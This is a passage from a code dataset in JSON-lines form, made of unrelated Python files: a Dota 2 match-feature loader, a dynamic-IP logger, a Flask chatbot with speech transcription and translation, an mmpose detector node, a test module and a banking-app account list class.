mm[\"gold_delta5_ratio_total\"] = (mm[\"gold_delta5_total_0\"] + 1) / (\n mm[\"gold_delta5_total_0\"] + mm[\"gold_delta5_total_1\"] + 2)\n mm[\"xp_delta1_ratio_total\"] = (mm[\"xp_delta1_total_0\"] + 1) / (\n mm[\"xp_delta1_total_0\"] + mm[\"xp_delta1_total_1\"] + 2)\n mm[\"xp_delta5_ratio_total\"] = (mm[\"xp_delta5_total_0\"] + 1) / (\n mm[\"xp_delta5_total_0\"] + mm[\"xp_delta5_total_1\"] + 2)\n\n # derivatives (mean)\n for i, v in enumerate(\n sorted([0 if t == 0 else m['players'][i]['gold_t'][t] / t for i in range(5)])):\n mm[f\"gpm_0_{i}\"] = v\n for i, v in enumerate(\n sorted([0 if t == 0 else m['players'][i]['gold_t'][t] / t for i in range(5, 10)])):\n mm[f\"gpm_1_{i}\"] = v\n for i, v in enumerate(sorted([0 if t == 0 else m['players'][i]['xp_t'][t] / t for i in range(5)])):\n mm[f\"xpm_0_{i}\"] = v\n for i, v in enumerate(\n sorted([0 if t == 0 else m['players'][i]['xp_t'][t] / t for i in range(5, 10)])):\n mm[f\"xpm_1_{i}\"] = v\n\n # derivatives (variation)\n mm[\"gold_variation_0\"] = stats.variation([m['players'][i]['gold_t'][t] + 1.0 for i in range(5)])\n mm[\"gold_variation_1\"] = stats.variation([m['players'][i]['gold_t'][t] + 1.0 for i in range(5, 10)])\n mm[\"xp_variation_0\"] = stats.variation([m['players'][i]['xp_t'][t] + 1.0 for i in range(5)])\n mm[\"xp_variation_1\"] = stats.variation([m['players'][i]['xp_t'][t] + 1.0 for i in range(5, 10)])\n\n lst.append(mm)\n return 
pandas.DataFrame(lst)\n\n\ndef load_as_data_frame(path_data, sets=('train', 'valid', 'test')):\n lst = {}\n for s in sets:\n lst[s] = []\n\n for path_match in tqdm(os.listdir(path_data)):\n if _check_path_match(path_match) in sets and os.path.isfile(os.path.join(path_data, path_match)):\n lst[_check_path_match(path_match)].append(int(path_match[:-5]))\n\n if 'test' in sets:\n li = lst['test']\n df = {}\n with Pool(12) as pool:\n for s in sets:\n df[s] = pandas.concat(pool.map(_FileLoader(path_data), np.array(lst[s]), chunksize=256), ignore_index=True)\n df[s].region = df[s].region.astype('category')\n del lst[s]\n del lst\n\n if 'test' in sets:\n return df, li\n else:\n return df\n\n\nclass DotaData(Dataset):\n def __init__(self, path_data, mode, transform=None):\n self.path_data = []\n self.mode = mode\n for path_match in tqdm(os.listdir(path_data)):\n if os.path.isfile(os.path.join(path_data, path_match)):\n if _check_path_match(path_match) == mode:\n self.path_data.append(os.path.join(path_data, path_match))\n self.transform = transform\n\n def __len__(self):\n return len(self.path_data)\n\n def __getitem__(self, index):\n with open(self.path_data[index], mode='r', encoding='utf-8') as f:\n m = json.load(f)\n if self.transform is not None:\n m = self.transform(m)\n return m\n\n @staticmethod\n def extract_match(m):\n si, sg, e = [], [], []\n hero = torch.LongTensor([m['players'][i]['hero_id'] - 1 for i in range(10)])\n for t in range(len(m['players'][0]['gold_t'])):\n ll = []\n\n gold = torch.FloatTensor([m['players'][i]['gold_t'][t] for i in range(10)])\n ll.append(gold.view(10, 1))\n xp = torch.FloatTensor([m['players'][i]['xp_t'][t] for i in range(10)])\n ll.append(xp.view(10, 1))\n lh = torch.FloatTensor([m['players'][i]['lh_t'][t] for i in range(10)])\n ll.append(lh.view(10, 1))\n dn = torch.FloatTensor([m['players'][i]['dn_t'][t] for i in range(10)])\n ll.append(dn.view(10, 1))\n lv = torch.FloatTensor([get_lv_from_total_xp(m['players'][i]['xp_t'][t]) for i in range(10)])\n ll.append(lv.view(10, 1))\n chatwheel = torch.FloatTensor([chatwheel_count(m, i, t) for i in range(10)])\n ll.append(chatwheel.view(10, 1))\n chat = torch.FloatTensor([chat_count(m, i, t) for i in range(10)])\n ll.append(chat.view(10, 1))\n pred_vict = torch.FloatTensor([int(m['players'][i]['pred_vict']) for i in range(10)])\n ll.append(pred_vict.view(10, 1))\n purchase = purchase_states_array(m, items_list, t)\n ll.append(purchase)\n rune5 = torch.FloatTensor(\n [sum(1 for r in m['players'][i]['runes_log'] if r['key'] == 5 and r['time'] < t * 60) for i in\n range(10)])\n ll.append(rune5.view(10, 1))\n\n gold_ratio = (gold + 1.0) / (gold.sum() + 10.0)\n ll.append(gold_ratio.view(10, 1))\n xp_ratio = (xp + 1.0) / (xp.sum() + 10.0)\n ll.append(xp_ratio.view(10, 1))\n lh_ratio = (lh + 1.0) / (lh.sum() + 10.0)\n ll.append(lh_ratio.view(10, 1))\n dn_ratio = (dn + 1.0) / (dn.sum() + 10.0)\n ll.append(dn_ratio.view(10, 1))\n\n gold_delta1 = torch.FloatTensor(\n [m['players'][i]['gold_t'][t] - m['players'][i]['gold_t'][max(t - 1, 0)] for i in range(10)])\n ll.append(gold_delta1.view(10, 1))\n xp_delta1 = torch.FloatTensor(\n [m['players'][i]['xp_t'][t] - m['players'][i]['xp_t'][max(t - 1, 0)] for i in range(10)])\n ll.append(xp_delta1.view(10, 1))\n gold_delta5 = torch.FloatTensor(\n [m['players'][i]['gold_t'][t] - m['players'][i]['gold_t'][max(t - 5, 0)] for i in range(10)])\n ll.append(gold_delta5.view(10, 1))\n xp_delta5 = torch.FloatTensor(\n [m['players'][i]['xp_t'][t] - m['players'][i]['xp_t'][max(t - 5, 0)] for 
i in range(10)])\n ll.append(xp_delta5.view(10, 1))\n\n gpm = torch.FloatTensor([0 if t == 0 else m['players'][i]['gold_t'][t] / t for i in range(10)])\n ll.append(gpm.view(10, 1))\n xpm = torch.FloatTensor([0 if t == 0 else m['players'][i]['xp_t'][t] / t for i in range(10)])\n ll.append(xpm.view(10, 1))\n\n si.append(torch.cat(ll, dim=1))\n\n ll = []\n\n chatwheel_total = torch.FloatTensor([\n sum(chatwheel_count(m, i, t) for i in range(5)),\n sum(chatwheel_count(m, i, t) for i in range(5, 10))\n ])\n gold_total = torch.FloatTensor([\n sum(m['players'][i]['gold_t'][t] for i in range(5)),\n sum(m['players'][i]['gold_t'][t] for i in range(5, 10))\n ])\n ll.append(gold_total)\n xp_total = torch.FloatTensor([\n sum(m['players'][i]['xp_t'][t] for i in range(5)),\n sum(m['players'][i]['xp_t'][t] for i in range(5, 10))\n ])\n ll.append(xp_total)\n lh_total = torch.FloatTensor([lh[:5].sum(), lh[5:].sum()])\n ll.append(lh_total)\n dn_total = torch.FloatTensor([dn[:5].sum(), dn[5:].sum()])\n ll.append(dn_total)\n rune5_total = torch.FloatTensor([rune5[:5].sum(), rune5[5:].sum()])\n ll.append(rune5_total)\n gold_delta1_total = torch.FloatTensor([\n sum(m['players'][i]['gold_t'][t] - m['players'][i]['gold_t'][max(t - 1, 0)] for i in range(5)),\n sum(m['players'][i]['gold_t'][t] - m['players'][i]['gold_t'][max(t - 1, 0)] for i in range(5, 10))\n ])\n ll.append(gold_delta1_total)\n gold_delta5_total = torch.FloatTensor([\n sum(m['players'][i]['gold_t'][t] - m['players'][i]['gold_t'][max(t - 5, 0)] for i in range(5)),\n sum(m['players'][i]['gold_t'][t] - m['players'][i]['gold_t'][max(t - 5, 0)] for i in range(5, 10))\n ])\n ll.append(gold_delta5_total)\n xp_delta1_total = torch.FloatTensor([\n sum(m['players'][i]['xp_t'][t] - m['players'][i]['xp_t'][max(t - 1, 0)] for i in range(5)),\n sum(m['players'][i]['xp_t'][t] - m['players'][i]['xp_t'][max(t - 1, 0)] for i in range(5, 10))\n ])\n ll.append(xp_delta1_total)\n xp_delta5_total = torch.FloatTensor([\n sum(m['players'][i]['xp_t'][t] - m['players'][i]['xp_t'][max(t - 5, 0)] for i in range(5)),\n sum(m['players'][i]['xp_t'][t] - m['players'][i]['xp_t'][max(t - 5, 0)] for i in range(5, 10))\n ])\n ll.append(xp_delta5_total)\n ll = ll + [torch.log1p(t) for t in ll]\n\n building = building_states_array(m, t)\n ll.append(building)\n ll.append(chatwheel_total)\n pred_vict = torch.FloatTensor([\n sum(m['players'][i]['pred_vict'] for i in range(5)),\n sum(m['players'][i]['pred_vict'] for i in range(5, 10))\n ])\n ll.append(pred_vict)\n gold_variation = torch.FloatTensor([\n stats.variation([m['players'][i]['gold_t'][t] + 1 for i in range(5)]),\n stats.variation([m['players'][i]['gold_t'][t] + 1 for i in range(5, 10)])\n ])\n ll.append(gold_variation)\n xp_variation = torch.FloatTensor([\n stats.variation([m['players'][i]['xp_t'][t] + 1 for i in range(5)]),\n stats.variation([m['players'][i]['xp_t'][t] + 1 for i in range(5, 10)])\n ])\n ll.append(xp_variation)\n region = torch.zeros(25, dtype=torch.float)\n region[m['region'] - 1] = 1.0\n ll.append(region)\n\n sg.append(torch.cat(ll))\n\n for i in range(5):\n for j in m['players'][i]['kills_log']:\n for k in range(5, 10):\n if m['players'][k]['hero_id'] == hero2id[j['key']]:\n mask = torch.zeros(10, dtype=torch.uint8)\n mask[[i, k]] = 1\n e.append((0, j['time'], mask))\n break\n for i in range(5, 10):\n for j in m['players'][i]['kills_log']:\n for k in range(5):\n if m['players'][k]['hero_id'] == hero2id[j['key']]:\n mask = torch.zeros(10, dtype=torch.uint8)\n mask[[i, k]] = 1\n e.append((1, j['time'], mask))\n 
break\n for i in range(5):\n for j in m['players'][i]['buyback_log']:\n mask = torch.zeros(10, dtype=torch.uint8)\n mask[i] = 1\n e.append((2, j['time'], mask))\n for i in range(5, 10):\n for j in m['players'][i]['buyback_log']:\n mask = torch.zeros(10, dtype=torch.uint8)\n mask[i] = 1\n e.append((3, j['time'], mask))\n for i in range(5):\n for j in m['players'][i]['runes_log']:\n if j['key'] != 5:\n mask = torch.zeros(10, dtype=torch.uint8)\n mask[i] = 1\n e.append((4 + j['key'], j['time'], mask))\n for i in range(5, 10):\n for j in m['players'][i]['runes_log']:\n if j['key'] != 5:\n mask = torch.zeros(10, dtype=torch.uint8)\n mask[i] = 1\n e.append((11 + j['key'], j['time'], mask))\n for i in m['objectives']:\n if i['type'] == 'CHAT_MESSAGE_FIRSTBLOOD':\n mask = torch.zeros(10, dtype=torch.uint8)\n mask[i['slot']] = 1\n e.append((18 if i['slot'] < 5 else 19, i['time'], mask))\n elif i['type'] == 'CHAT_MESSAGE_ROSHAN_KILL':\n mask = torch.zeros(10, dtype=torch.uint8)\n if i['team'] == 2:\n mask[[0, 1, 2, 3, 4]] = 1\n e.append((20, i['time'], mask))\n elif i['team'] == 3:\n mask[[5, 6, 7, 8, 9]] = 1\n e.append((21, i['time'], mask))\n else:\n raise Exception('unknown team')\n elif i['type'] == 'CHAT_MESSAGE_AEGIS':\n mask = torch.zeros(10, dtype=torch.uint8)\n mask[i['slot']] = 1\n e.append((22 if i['slot'] < 5 else 23, i['time'], mask))\n elif i['type'] == 'building_kill':\n mask = torch.ones(10, dtype=torch.uint8)\n bid = building_id(i['key'])\n if bid != -1:\n e.append((24 + bid, i['time'], mask))\n e.append((58, -90, torch.ones(10, dtype=torch.uint8)))\n e = sorted(e, key=lambda x: x[1])\n\n return si, hero, sg, e, 1 - int(m['radiant_win']), m['duration']\n\n @staticmethod\n def transform_train(m):\n si, hero, sg, e, y, dur = DotaData.extract_match(m)\n si = si[:128]\n sg = sg[:128]\n e = [ev for ev in e if ev[1] <= len(si) * 60]\n e, e_t, e_mask = zip(*e)\n e = torch.LongTensor(e)\n e_t = torch.LongTensor(e_t)\n e_t.clamp_(max=len(si) * 60 - 1)\n e_mask = torch.stack(e_mask)\n return torch.stack(si), hero, torch.stack(sg), len(si), e, e_t, e_mask, e.size(0), y, dur\n\n @staticmethod\n def transform_valid(m):\n si, hero, sg, e, y, dur = DotaData.extract_match(m)\n e, e_t, e_mask = zip(*e)\n e = torch.LongTensor(e)\n e_t = torch.LongTensor(e_t)\n e_t.clamp_(max=len(si) * 60 - 1)\n e_mask = torch.stack(e_mask)\n return torch.stack(si), hero, torch.stack(sg), len(si), e, e_t, e_mask, e.size(0), y, dur\n\n @staticmethod\n def transform_test(m):\n si, hero, sg, e, y, dur = DotaData.extract_match(m)\n e, e_t, e_mask = zip(*e)\n e = torch.LongTensor(e)\n e_t = torch.LongTensor(e_t)\n e_t.clamp_(max=len(si) * 60 - 1)\n e_mask = torch.stack(e_mask)\n return torch.stack(si), hero, torch.stack(sg), len(si), e, e_t, e_mask, e.size(0), y, dur, m['match_id']\n\n @staticmethod\n def collate_fn(batch):\n batch = sorted(batch, key=lambda item: item[3], reverse=True)\n si_b, hero_b, sg_b, x_len_b, e_b, e_t_b, e_mask_b, e_len_b, y_b, z_b = zip(*batch)\n si = pad_sequence(si_b, batch_first=True) # Float[bs, max_t, 10, d_si]\n hero = torch.stack(hero_b) # Long[bs, 10]\n sg = pad_sequence(sg_b, batch_first=True) # Float[bs, max_t, d_sg]\n x_len = torch.LongTensor(x_len_b) # Long[bs]\n e = pad_sequence(e_b, batch_first=True) # Float[bs, max_e]\n e_t = pad_sequence(e_t_b, batch_first=True) # Float[bs, max_e]\n e_mask = pad_sequence(e_mask_b, batch_first=True) # Float[bs, max_e, 10]\n e_len = torch.LongTensor(e_len_b)\n y = torch.LongTensor(y_b) # Long[bs]\n z = torch.FloatTensor(z_b) # Float[bs]\n return si, 
hero, sg, x_len, e, e_t, e_mask, e_len, y, z\n\n @staticmethod\n def collate_fn_with_id(batch):\n batch = sorted(batch, key=lambda item: item[3], reverse=True)\n si_b, hero_b, sg_b, x_len_b, e_b, e_t_b, e_mask_b, e_len_b, y_b, z_b, m_id_b = zip(*batch)\n si = pad_sequence(si_b, batch_first=True) # Float[bs, max_t, 10, d_si]\n hero = torch.stack(hero_b) # Long[bs, 10]\n sg = pad_sequence(sg_b, batch_first=True) # Float[bs, max_t, d_sg]\n x_len = torch.LongTensor(x_len_b) # Long[bs]\n e = pad_sequence(e_b, batch_first=True) # Float[bs, max_e]\n e_t = pad_sequence(e_t_b, batch_first=True) # Float[bs, max_e]\n e_mask = pad_sequence(e_mask_b, batch_first=True) # Float[bs, max_e, 10]\n e_len = torch.LongTensor(e_len_b)\n y = torch.LongTensor(y_b) # Long[bs]\n z = torch.FloatTensor(z_b) # Float[bs]\n m_id = torch.LongTensor(m_id_b)\n return si, hero, sg, x_len, e, e_t, e_mask, e_len, y, z, m_id\n","repo_name":"jvvvmh/Quantitative-Competitions","sub_path":"Winning Probability of Dota2 - Real-time Prediction/code/dota_data.py","file_name":"dota_data.py","file_ext":"py","file_size_in_byte":45051,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"2084283527","text":"# create to get Dynamic IP\n#add time + ip written in txt\nimport socket\nimport os\nfrom time import sleep,ctime,strftime\nimport time\n\nclass GetIp(object):\n\n \n \n global TIME\n# global path\n# path = '/Users/ahaic/Desktop/ip_log.txt'\n\n def __init__(self,url,path):\n\n self.url=url\n self.ip=''\n self.path = path\n \n self.record_ip()\n\n \n\n def get_ip(self):\n global IP\n\n try:\n\n IP=str(socket.gethostbyname_ex(self.url)[2][0])\n \n print(IP)\n \n except socket.error as e:\n\n print('socket error: %s ' % e)\n sleep(100)\n self.get_ip()\n\n def record_ip(self):\n while True:\n self.get_ip()\n \n \n if os.path.isfile(self.path) !=True:\n\n print('file does not exists ')\n \n try:\n ip_log = open(self.path,'w')\n\n except IOError:\n print('IO Error ')\n exit()\n \n \n else:\n try:\n \n ip_log=open(self.path,'a')\n except:\n print(' open file failed in a mode')\n else:\n print('file open successfully')\n \n try:\n self.output()\n ip_log.write('%s \\n %s ' % (self.row1,self.row2))\n ip_log.write('\\n')\n ip_log.close()\n \n \n except Exception as e: # catch all exception\n print('written failed :', e)\n print('stop running')\n break\n else:\n print('written \\n waiting for next writting')\n \n\n sleep(3600)\n \n def set_time(self):\n\n pass\n \n \n \n def output(self):\n\n li = 18 -len(IP)\n ip=\" \"+IP+(li*\" \")\n\n time = strftime('%d-%m-%Y')+ \" \" +strftime('%H:%M:%S')\n lt = 18-len(time)\n time=\" \"+time+(lt*\" \")\n \n self.row1 =(22*'-')+'+'+(22*'-')\n \n self.row2='|'+ip+'|'+time+'|'\n\n # return self.row1\n \n\n\n\n \n \n\n \nobj = GetIp('paksila.xicp.net','/home/ip_log.txt')\n\n#obj = GetIp('paksila.xicp.net','/Users/ahaic/Desktop/ip_log.txt')\n\nprint('ip address: ', IP)\n \n \n \n","repo_name":"ahaic/project","sub_path":"get_ip.py","file_name":"get_ip.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38934144364","text":"from flask import Flask, render_template, request,jsonify\nimport nltk\nfrom nltk.stem import WordNetLemmatizer\nimport numpy as np\nimport tflearn\nimport tensorflow as tf\nimport random\nimport yaml\nimport requests\nimport libretranslatepy\n#transcription\nimport whisper\nimport sounddevice as sd\nimport soundfile as sf\nimport 
subprocess\n\napp = Flask(__name__)\n\nwith open(\"intents.yaml\") as file:\n data = yaml.safe_load(file)\n\nlemmatizer = WordNetLemmatizer()\n\nwords = []\nlabels = []\ndocs_x = []\ndocs_y = []\n\n# Tokenize and lemmatize words in patterns\nfor intent in data[\"intents\"]:\n for pattern in intent[\"patterns\"]:\n tokens = nltk.word_tokenize(pattern)\n words.extend(tokens)\n docs_x.append([lemmatizer.lemmatize(word) for word in tokens])\n docs_y.append(intent[\"tag\"])\n\n if intent[\"tag\"] not in labels:\n labels.append(intent[\"tag\"])\n\n# Sort and remove duplicates\nwords = sorted(set(words))\nlabels = sorted(set(labels))\n\n# Build a Bag of Words for each pattern\ntraining = []\noutput = []\n\nout_empty = [0] * len(labels)\n\nfor x, doc in enumerate(docs_x):\n bag = []\n wrds = [lemmatizer.lemmatize(word.lower()) for word in doc]\n\n for word in words:\n if word in wrds:\n bag.append(1)\n else:\n bag.append(0)\n\n output_row = out_empty[:]\n output_row[labels.index(docs_y[x])] = 1\n\n training.append(bag)\n output.append(output_row)\n# Convert to numpy array\ntraining = np.array(training)\noutput = np.array(output)\n# Build the neural network\ntf.compat.v1.reset_default_graph()\nnet = tflearn.input_data(shape=[None, len(training[0])])\nnet = tflearn.fully_connected(net, 8)\nnet = tflearn.fully_connected(net, 8)\nnet = tflearn.fully_connected(net, len(output[0]), activation=\"softmax\")\nnet = tflearn.regression(net)\nmodel = tflearn.DNN(net)\n# Train the model\nmodel.fit(training, output, n_epoch=1000, batch_size=8, show_metric=True)\nmodel.save(\"model.tflearn\")\n# Load the model\nmodel.load(\"model.tflearn\")\ntry:\n cmd = ['libretranslate']\n subprocess.Popen(cmd)\nexcept print(0):\n pass\n\n\n@app.route(\"/home\")\ndef home():\n return render_template(\"home.html\")\n# Respond to user input\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n\n\n@app.route(\"/record\", methods=[\"POST\"])\ndef record():\n model = whisper.load_model(\"tiny.en\") # Load English model\n audio_file = \"recorded_audio.wav\" # File to save recorded audio\n seconds = 5 # Recording duration in seconds\n\n # Record audio from user\n fs = 16000 # Sample rate\n print(\"Recording...\")\n myrecording = sd.rec(int(seconds * fs), samplerate=fs, channels=1)\n sd.wait() # Wait until recording is finished\n sf.write(audio_file, myrecording, fs) # Save as WAV file\n\n # Transcribe audio using Whisper\n result = model.transcribe(audio_file)\n transcription = result[\"text\"]\n print(\"Transcription:\", transcription)\n\n # Send transcription to /get endpoint\n response = requests.get(\"http://localhost:5000/get\", params={\"msg\": transcription})\n \n return jsonify({\"transcription\": transcription})\n\n#botresponse\n@app.route(\"/get\")\ndef get_bot_response():\n user_input = request.args.get(\"msg\")\n # detect language and translate to English\n response = requests.post(\"http://localhost:5000/detect\", json={\"q\": user_input}).json()\n lang = response[0][\"language\"]\n if lang != \"en\":\n response = requests.post(\"http://localhost:5000/translate\", json={\"q\": user_input, \"source\": lang, \"target\": \"en\"}).json()\n user_input = response[\"translatedText\"]\n # get model response\n results = model.predict([BagOfWords(user_input, words, lemmatizer)])\n results_index = np.argmax(results)\n tag = labels[results_index]\n for intent in data[\"intents\"]:\n if intent[\"tag\"] == tag:\n responses = intent[\"responses\"]\n break\n response = random.choice(responses)\n # translate model 
response back to the original language\n if lang != \"en\":\n response = requests.post(\"http://localhost:5000/translate\", json={\"q\": response, \"source\": \"en\", \"target\": lang}).json()[\"translatedText\"]\n return response\ndef BagOfWords(s, words, lemmatizer):\n bag = [0] * len(words)\n s_words = nltk.word_tokenize(s)\n s_words = [lemmatizer.lemmatize(word.lower()) for word in s_words]\n\n for se in s_words:\n for i, word in enumerate(words):\n if word == se:\n bag[i] = 1\n return np.array(bag)\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port='8080')\n","repo_name":"danpizzy/tensewhisper","sub_path":"librewhisper.py","file_name":"librewhisper.py","file_ext":"py","file_size_in_byte":4533,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"2723451675","text":"from pylab import *\r\nimport random\r\n\r\n#plot([1, 2, 3, 4])\r\n#plot([5, 6, 7, 8])\r\n#plot([1, 2, 3, 4], [1, 4, 9, 16])\r\n#\r\n#figure()\r\n#plot([1, 2, 3, 4], [1, 4, 9, 16], 'ro')\r\n#axis([0, 6, 0, 20])\r\n#title('Erarings')\r\n#xlabel('Days')\r\n#ylabel('Dollars')\r\n\r\n#figure()\r\n#xAxis = array([1, 2, 3, 4])\r\n#print xAxis\r\n#test = arange(1, 5)\r\n#print test\r\n#print test == xAxis\r\n#yAxis = xAxis**3\r\n#plot(xAxis, yAxis, 'ro')\r\n\r\nfigure()\r\nvals = []\r\ndiaVals = [1, 2, 3, 4, 5, 6]\r\nfor i in range(10000):\r\n vals.append(random.choice(diaVals) + random.choice(diaVals))\r\nhist(vals, normed = 11)\r\nshow()\r\n","repo_name":"sunzhy3/exercise","sub_path":"mit6.00/plotTest.py","file_name":"plotTest.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40487613859","text":"from itertools import zip_longest\nfrom typing import Dict, List, Optional, Union\n\nimport numpy as np\n\nfrom ...utils import get_config_path\nfrom ..node import Node\nfrom ..registry import NODES\n\ntry:\n from mmdet.apis import inference_detector, init_detector\n has_mmdet = True\nexcept (ImportError, ModuleNotFoundError):\n has_mmdet = False\n\n\n@NODES.register_module()\nclass DetectorNode(Node):\n \"\"\"Detect objects from the frame image using MMDetection model.\n\n Note that MMDetection is required for this node. Please refer to\n `MMDetection documentation `_ for the installation guide.\n\n Parameters:\n name (str): The node name (also thread name)\n model_cfg (str): The model config file\n model_checkpoint (str): The model checkpoint file\n input_buffer (str): The name of the input buffer\n output_buffer (str|list): The name(s) of the output buffer(s)\n enable_key (str|int, optional): Set a hot-key to toggle enable/disable\n of the node. If an int value is given, it will be treated as an\n ascii code of a key. Please note: (1) If ``enable_key`` is set,\n the ``bypass()`` method need to be overridden to define the node\n behavior when disabled; (2) Some hot-keys are reserved for\n particular use. For example: 'q', 'Q' and 27 are used for exiting.\n Default: ``None``\n enable (bool): Default enable/disable status. Default: ``True``\n device (str): Specify the device to hold model weights and inference\n the model. Default: ``'cuda:0'``\n bbox_thr (float): Set a threshold to filter out objects with low bbox\n scores. Default: 0.5\n multi_input (bool): Whether load all frames in input buffer. If True,\n all frames in buffer will be loaded and stacked. The latest frame\n is used to detect objects of interest. Default: False\n\n Example::\n >>> cfg = dict(\n ... 
type='DetectorNode',\n ... name='detector',\n ... model_config='demo/mmdetection_cfg/'\n ... 'ssdlite_mobilenetv2_scratch_600e_coco.py',\n ... model_checkpoint='https://download.openmmlab.com'\n ... '/mmdetection/v2.0/ssd/'\n ... 'ssdlite_mobilenetv2_scratch_600e_coco/ssdlite_mobilenetv2_'\n ... 'scratch_600e_coco_20210629_110627-974d9307.pth',\n ... # `_input_` is an executor-reserved buffer\n ... input_buffer='_input_',\n ... output_buffer='det_result')\n\n >>> from mmpose.apis.webcam.nodes import NODES\n >>> node = NODES.build(cfg)\n \"\"\"\n\n def __init__(self,\n name: str,\n model_config: str,\n model_checkpoint: str,\n input_buffer: str,\n output_buffer: Union[str, List[str]],\n enable_key: Optional[Union[str, int]] = None,\n enable: bool = True,\n device: str = 'cuda:0',\n bbox_thr: float = 0.5,\n multi_input: bool = False):\n # Check mmdetection is installed\n assert has_mmdet, \\\n f'MMDetection is required for {self.__class__.__name__}.'\n\n super().__init__(\n name=name,\n enable_key=enable_key,\n enable=enable,\n multi_input=multi_input)\n\n self.model_config = get_config_path(model_config, 'mmdet')\n self.model_checkpoint = model_checkpoint\n self.device = device.lower()\n self.bbox_thr = bbox_thr\n\n # Init model\n self.model = init_detector(\n self.model_config, self.model_checkpoint, device=self.device)\n\n # Register buffers\n self.register_input_buffer(input_buffer, 'input', trigger=True)\n self.register_output_buffer(output_buffer)\n\n def bypass(self, input_msgs):\n return input_msgs['input']\n\n def process(self, input_msgs):\n input_msg = input_msgs['input']\n\n if self.multi_input:\n imgs = [frame.get_image() for frame in input_msg]\n input_msg = input_msg[-1]\n\n img = input_msg.get_image()\n\n preds = inference_detector(self.model, img)\n objects = self._post_process(preds)\n input_msg.update_objects(objects)\n\n if self.multi_input:\n input_msg.set_image(np.stack(imgs, axis=0))\n\n return input_msg\n\n def _post_process(self, preds) -> List[Dict]:\n \"\"\"Post-process the predictions of MMDetection model.\"\"\"\n if isinstance(preds, tuple):\n dets = preds[0]\n segms = preds[1]\n else:\n dets = preds\n segms = [[]] * len(dets)\n\n classes = self.model.CLASSES\n if isinstance(classes, str):\n classes = (classes, )\n\n assert len(dets) == len(classes)\n assert len(segms) == len(classes)\n\n objects = []\n\n for i, (label, bboxes, masks) in enumerate(zip(classes, dets, segms)):\n\n for bbox, mask in zip_longest(bboxes, masks):\n if bbox[4] < self.bbox_thr:\n continue\n obj = {\n 'class_id': i,\n 'label': label,\n 'bbox': bbox,\n 'mask': mask,\n 'det_model_cfg': self.model.cfg\n }\n objects.append(obj)\n\n return objects\n","repo_name":"aim-uofa/Poseur","sub_path":"mmpose/apis/webcam/nodes/model_nodes/detector_node.py","file_name":"detector_node.py","file_ext":"py","file_size_in_byte":5472,"program_lang":"python","lang":"en","doc_type":"code","stars":158,"dataset":"github-code","pt":"61"} +{"seq_id":"74123668675","text":"from unittest.mock import call\n\nimport pytest\n\nfrom calcipy.tasks.executable_utils import python_dir\nfrom calcipy.tasks.types import mypy, pyright\n\n\n@pytest.mark.parametrize(\n ('task', 'kwargs', 'commands'),\n [\n (pyright, {}, [\n call('which pyright', warn=True, hide=True),\n 'pyright calcipy',\n ]),\n (mypy, {}, [f'{python_dir()}/mypy calcipy']),\n ],\n)\ndef test_types(ctx, task, kwargs, commands):\n task(ctx, **kwargs)\n\n ctx.run.assert_has_calls([\n call(cmd) if isinstance(cmd, str) else cmd\n for cmd in commands\n 
])\n","repo_name":"KyleKing/calcipy","sub_path":"tests/tasks/test_types.py","file_name":"test_types.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"61"} +{"seq_id":"3535799523","text":"from wxbanker.lib.pubsub import Publisher\nfrom wxbanker import bankexceptions\n\n\nclass AccountList(list):\n def __init__(self, bankmodel, store):\n list.__init__(self, store.GetAccounts())\n # Make sure all the items know their parent list.\n for account in self:\n account.Parent = self\n\n self.BankModel = bankmodel\n self.Store = store\n self.sort()\n \n Publisher.subscribe(self.onAccountRenamed, \"ormobject.updated.Account.Name\")\n \n def GetRecurringTransactions(self):\n allRecurrings = []\n for account in self:\n recurrings = account.GetRecurringTransactions()\n if recurrings:\n allRecurrings.extend(recurrings)\n \n return allRecurrings\n\n def GetBalance(self):\n totalCurrency = self.BankModel.GlobalCurrency\n total = 0\n for account in self:\n total = total + account.GetBalance(totalCurrency)\n return total\n \n def GetById(self, theId):\n for account in self:\n if account.ID == theId:\n return account\n\n def AccountIndex(self, accountName):\n for i, account in enumerate(self):\n if account.Name == accountName:\n return i\n return -1\n\n def ThrowExceptionOnInvalidName(self, accountName):\n # First make sure we were given a name!\n if not accountName:\n raise bankexceptions.BlankAccountNameException\n # Now ensure an account by that name doesn't already exist.\n if self.AccountIndex(accountName) >= 0:\n raise bankexceptions.AccountAlreadyExistsException(accountName)\n\n def Create(self, accountName):\n self.ThrowExceptionOnInvalidName(accountName)\n\n currency = 0\n if len(self):\n # If the list contains items, the currency needs to be consistent.\n currency = self[-1].Currency\n\n account = self.Store.CreateAccount(accountName, currency)\n # Make sure this account knows its parent.\n account.Parent = self\n self.append(account)\n self.sort()\n Publisher.sendMessage(\"account.created.%s\" % accountName, account)\n return account\n\n def Remove(self, accountName):\n index = self.AccountIndex(accountName)\n if index == -1:\n raise bankexceptions.InvalidAccountException(accountName)\n\n account = self.pop(index)\n # Remove all the transactions associated with this account.\n account.Purge()\n \n Publisher.sendMessage(\"account.removed.%s\"%accountName, account)\n\n def __eq__(self, other):\n if len(self) != len(other):\n return False\n for leftAccount, rightAccount in zip(self, other):\n if not leftAccount == rightAccount:\n return False\n\n return True\n \n def onAccountRenamed(self, message):\n self.sort()\n\n Balance = property(GetBalance)\n\n","repo_name":"mrooney/wxbanker","sub_path":"wxbanker/bankobjects/accountlist.py","file_name":"accountlist.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"61"} +{"seq_id":"41786935095","text":"#\n# Check if there are any warnings, and send emails\n#\n\nimport os\nimport sys\n\nfrom email.mime.application import MIMEApplication\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\n\nimport boto\n\n\n# people who should receive this alerts\nSEND_TO = ()\n\n# alert thresholds\nMIN_TIME = 5 # in seconds\nMAX_TIME = 30*60 # in seconds\n\n\nCWD = 